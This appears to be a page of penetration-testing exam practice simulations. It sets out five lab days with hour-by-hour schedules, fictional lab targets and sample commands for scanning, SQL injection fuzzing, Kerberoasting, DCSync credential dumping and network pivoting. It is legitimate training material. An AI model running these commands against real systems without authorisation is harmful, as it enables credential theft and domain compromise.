> Mock Exam Simulator

5 full-day exam simulations with hour-by-hour schedules and realistic 10-box AD scenarios. Train your methodology, not just your tools.

⚠ SIMULATION RULES β€” Read Before Starting
Treat each simulation day as a real exam. No walkthroughs, no hints until you've spent the allocated time. Document everything as you go β€” your notes from each simulation are your report drafts.
// DurationEach sim day = 8 focused hours. Take 1 hour off after hour 4.
// DocumentationScreenshot every compromise. Note timestamps. Write findings as you go, not at the end.
// Tools AllowedSame as real exam: Kali tools, custom scripts, HTB VPN access.
// After Each DayWrite a 1-page debrief: what worked, what didn't, what you'd do differently.
DAY 1
Enumeration Blitz
Focus: External recon β†’ Web foothold β†’ Linux privesc
8 hours 4 targets
β–Ά
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Full Network Scan
Nmap all 4 targets. Document all open ports, services, OS. Do NOT start exploitation yet.
nmap -sC -sV -p- --open -T4 -oA initial 10.10.10.0/24
H2: 1:00–2:00
Web Enumeration
Fuzz all HTTP/HTTPS services. Identify tech stack, CMS, hidden directories, parameters.
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://TARGET/FUZZ
H3-4: 2:00–4:00
Exploitation Window #1
Attack the easiest web target. Get initial foothold. Enumerate local system post-compromise.
H5: 4:00–5:00
BREAK + Documentation
Step away 30 min. Return and write up what you've found so far in report format.
H6-7: 5:00–7:00
Privilege Escalation
Run LinPEAS/WinPEAS on compromised host. Find and exploit privesc path. Document thoroughly.
./linpeas.sh | tee /tmp/linpeas.txt
H8: 7:00–8:00
Report Writing Sprint
Write 2 complete findings from today's work. Include: title, CVSS, PoC, impact, remediation.
// DAY 1 CHECKLIST
// TODAY'S TARGETS
08:00:00
// SESSION TIMER
10.10.10.101
WEB-01 (Linux)
Apache 2.4, PHP, MySQL. Custom CMS with upload functionality.
HTTP:80SSH:22FTP:21
10.10.10.102
WEB-02 (Linux)
Nginx, Python Flask API. JWT authentication. Potential IDOR.
HTTP:80HTTPS:443SSH:22
10.10.10.103
BACKUP-01 (Linux)
FTP anonymous allowed. NFS exports. Old backup files in shares.
FTP:21NFS:2049SSH:22
10.10.10.104
WIN-01 (Windows 10)
IIS 10, WinRM enabled. MSSQL Express on non-standard port.
HTTP:80WinRM:5985MSSQL:1433
DAY 2
Active Directory Assault
Focus: Domain enumeration β†’ Kerberoasting β†’ ACL abuse β†’ DA
8 hours AD Lab
β–Ά
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
BloodHound Collection
Run BloodHound.py with all collection methods. Also run GetUserSPNs, GetNPUsers in parallel.
bloodhound-python -u user -p pass -d corp.local -c All --zip -dc-ip DC_IP
H2: 1:00–2:00
BloodHound Analysis
Import data. Find shortest paths from your user to DA. Identify Kerberoastable + AS-REP targets. Mark owned accounts.
H3-4: 2:00–4:00
Kerberoasting + Cracking
Extract all SPNs, crack with hashcat. For each cracked account, check BloodHound for new paths. Run ADCS enum.
hashcat -m 13100 spns.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
H5: 4:00–5:00
BREAK + Pivot Planning
Map out the full attack chain on paper. What's your current access? What's the next step to DA?
H6-7: 5:00–7:00
ACL Abuse / ADCS / DA Path
Execute the attack chain. If stuck, try alternate path (AS-REP, ADCS, Pass-the-Hash). Goal: DCSync.
impacket-secretsdump corp.local/admin@DC_IP -just-dc-ntlm
H8: 7:00–8:00
Document DA Access + Write Findings
Screenshot DA access (C$ share, whoami on DC). Write 3 AD findings: Kerberoastable accounts, path taken, DCSync.
// DAY 2 CHECKLIST
// AD ENVIRONMENT
08:00:00
// SESSION TIMER
10.10.10.5
DC01.CORP.LOCAL (DC)
Windows Server 2019. ADCS installed. 3 Kerberoastable service accounts. 1 AS-REP roastable user.
LDAP:389SMB:445ADCS
10.10.10.10
FS01.CORP.LOCAL (File Server)
Windows Server 2016. SMB shares. Helpdesk group has GenericWrite on IT_MANAGERS.
SMB:445WinRM:5985
Initial Creds
jdoe / Welcome1
Low-privilege domain user. Member of Domain Users only. Starting point for all enumeration.
domain userno special groups
Hint: Attack Path
Hidden Path Available
There are 2 paths to DA. One via Kerberoasting + ACL chain. One via ADCS ESC1. Try to find both without hints.
DAY 3
Web Application Deep Dive
Focus: SQLi, XSS, file upload, SSRF, IDOR β€” multi-vuln web app
8 hours 2 web apps
β–Ά
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Manual Recon + Burp Setup
Proxy all traffic through Burp. Map every endpoint, parameter, function manually. No automated scanning yet.
H2: 1:00–2:00
Parameter Fuzzing
Fuzz all parameters for SQLi, XSS, command injection. Use wfuzz or Burp Intruder. Note every anomaly.
wfuzz -c -z file,/usr/share/seclists/Fuzzing/SQLi/quick-SQLi.txt -u "http://TARGET/item?id=FUZZ"
H3-4: 2:00–4:00
Exploit SQLi + File Upload
Confirm and exploit SQLi (manual + sqlmap). Find file upload endpoint and bypass extension/MIME restrictions.
sqlmap -u "http://TARGET/item?id=1" --level=5 --risk=3 --dbs
H5: 4:00–5:00
BREAK + Findings Review
List all confirmed vulns. Prioritize by severity. Plan remaining exploitation.
H6-7: 5:00–7:00
App 2: SSRF + IDOR
Second application focuses on business logic flaws. Test all IDOR patterns. Hunt for SSRF to internal services.
H8: 7:00–8:00
Write 4 Web Findings
SQLi, File Upload, IDOR, SSRF β€” write each as a complete pentest finding with CVSS score and PoC steps.
// DAY 3 CHECKLIST
// WEB TARGETS
08:00:00
// SESSION TIMER
10.10.10.110
SHOP-APP (PHP/MySQL)
E-commerce application. Product search vulnerable to SQLi. Admin file upload accepts multiple types. Login has weak session handling.
SQLiFile UploadAuth Bypass
10.10.10.111
API-PLATFORM (Node.js)
REST API, JWT auth. User profile endpoint uses sequential IDs (IDOR). URL fetch function for importing data (SSRF). GraphQL endpoint exposed.
IDORSSRFGraphQL
Practice Resources
DVWA / HackTheBox Web
Practice on DVWA locally for web vulns, then tackle real HTB web challenges: Bolt, Horizontall, Pandora for similar scenarios.
DAY 4
Pivoting Gauntlet
Focus: Multi-hop pivoting, double pivot, internal AD via tunnel
8 hours 3 networks
β–Ά
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
DMZ Foothold
Compromise the DMZ host using the provided vulnerability. Enumerate all network interfaces to map internal subnets.
ip route; arp -a; cat /etc/hosts
H2: 1:00–2:00
Setup Ligolo-ng Pivot
Upload Ligolo-ng agent to DMZ host. Connect to proxy on Kali. Add route for internal subnet 1. Verify connectivity.
sudo ip route add 172.16.5.0/24 dev ligolo
H3-4: 2:00–4:00
Internal Network Enum + Compromise
Scan 172.16.5.0/24 via tunnel. Find and compromise a host. Enumerate its interfaces for deeper subnet.
H5: 4:00–5:00
BREAK + Route Planning
Draw the network topology on paper. Which subnets are reachable? Which host connects to which network?
H6-7: 5:00–7:00
Double Pivot to Deep Network
Set up Ligolo-ng listener on internal host. Connect Agent2 from deep network host. Scan and attack 192.168.100.0/24.
listener_add --addr 0.0.0.0:11602 --to 127.0.0.1:11601
H8: 7:00–8:00
Document Pivot Chain
Draw full network map with attack path. Write a "Network Segmentation Bypass" finding. Document all compromised hosts.
// DAY 4 CHECKLIST
// NETWORK TOPOLOGY
08:00:00
// SESSION TIMER
10.10.10.120
DMZ-WEB (Linux)
Directly reachable. Has eth0 (10.10.10.0/24) and eth1 (172.16.5.0/24). Vulnerable CMS for initial access.
DMZdual-homed
172.16.5.0/24
Internal Network 1
3 Windows hosts. File server with SMB, DC candidate, workstation. Accessible only via DMZ pivot.
SMB:445WinRM:5985RDP:3389
192.168.100.0/24
Deep Internal Network
Only reachable via double pivot. Contains the final target β€” a Linux database server with sensitive data.
double pivot neededMySQL:3306
DAY 5
Full Report Day
Focus: No hacking β€” write the complete exam report from Day 1–4 notes
8 hours Report Only
β–Ά
// HOUR-BY-HOUR SCHEDULE
H1: 0:00–1:00
Report Structure Setup
Open SysReptor. Create new project. Set up all sections: Executive Summary, Scope, Methodology, Findings, Appendix. Don't fill content yet.
H2-3: 1:00–3:00
Write All Findings
Target: 8–10 findings from 4 days. For each: title, CVSS 3.1 with vector, affected systems, PoC steps, impact, remediation. Aim for 15–20 min per finding.
H4: 3:00–4:00
Executive Summary
Write 1–2 page executive summary. Non-technical language. Cover: what was tested, what was found (severity counts), overall risk level, top 3 recommendations.
H5: 4:00–5:00
BREAK + Self Review
Step away. Return with fresh eyes. Read the report top to bottom as if you're the client.
H6-7: 5:00–7:00
Polish + Screenshots + Appendix
Add all screenshots to PoC sections. Verify CVSS scores. Add network diagram. Write attack narrative in methodology section. Check all commands are reproducible.
H8: 7:00–8:00
Export + Quality Check
Export PDF. Review formatting, page breaks, code blocks. Fix any issues. Time yourself: can you produce this quality in 2 exam days?
// DAY 5 REPORT CHECKLIST
// REPORT STANDARDS
08:00:00
// SESSION TIMER
Finding Quality
What Graders Look For
Clear title. Accurate CVSS. Numbered PoC steps a junior can follow. Business impact (not just "attacker can run code"). Actionable remediation.
CVSS Examples
Common CPTS Scores
RCE via web vuln β†’ 9.8 Critical. Kerberoasting β†’ 8.8 High. SMB null session β†’ 5.3 Medium. Password policy weakness β†’ 7.5 High.
Executive Summary
Structure Template
[1] What was tested and when. [2] Summary of findings by severity. [3] Most critical finding highlighted. [4] Overall security posture. [5] Top 3 recommendations.
Time Target
Benchmark Speed
You should complete a 10-finding report in 6–8 hours. If it takes longer, practice more with SysReptor templates before exam day.